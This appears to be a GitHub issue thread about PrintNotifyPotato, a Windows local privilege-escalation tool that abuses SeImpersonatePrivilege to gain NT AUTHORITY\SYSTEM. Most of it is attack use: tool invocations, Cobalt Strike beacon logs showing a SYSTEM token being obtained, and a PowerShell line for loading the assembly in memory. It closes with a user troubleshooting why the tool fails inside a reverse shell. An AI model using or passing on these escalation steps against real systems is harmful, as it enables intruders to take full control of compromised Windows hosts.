PrintNotifyPotato

nt authority\system is not displayed

Open kokxxoo opened this issue 3 years ago • 5 comments

Microsoft Windows Server 2012 R2 Standard

SeIncreaseQuotaPrivilege       İşlem için bellek kotaları ayarla                         Disabled
SeChangeNotifyPrivilege        Çapraz geçiş denetimini atla                              Enabled
SeImpersonatePrivilege         Kimlik doğrulamasından sonra istemcinin özelliklerini al  Enabled
SeIncreaseWorkingSetPrivilege  İşlem çalışma kümesini artır                              Disabled

[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......

[+] received output:
[*] Got Token: 0x330
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x860
[*] process start with pid 31060

kokxxoo Dec 13 '22 09:12

PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"

BeichenDream Dec 13 '22 10:12

[*] Tasked beacon to run .NET program: PrintNotifyPotato.exe "C:\Windows\System32\cmd.exe /c whoami"
[+] host called home, sent: 128121 bytes
[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x334

[+] received output:
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x852
[*] process start with pid 41840

kokxxoo Dec 13 '22 10:12

PrintNotifyPotato.exe  C:\Windows\System32\whoami.exe

BeichenDream Dec 13 '22 10:12

Tasked beacon to run .NET program: PrintNotifyPotato.exe C:\Windows\System32\whoami.exe
[+] host called home, sent: 128103 bytes
[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x31c
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x832
[*] process start with pid 46152

kokxxoo Dec 13 '22 10:12

MSSQL Server, VirtualBox, Windows Server 2016, 2019. When running it as a user in cmd, it works; in a reverse shell it is not working. Why?

Assembly loaded into PowerShell:

$entryPointMethod = $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

It is not working only on reverse TCP.

[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891

kaeso Apr 07 '23 11:04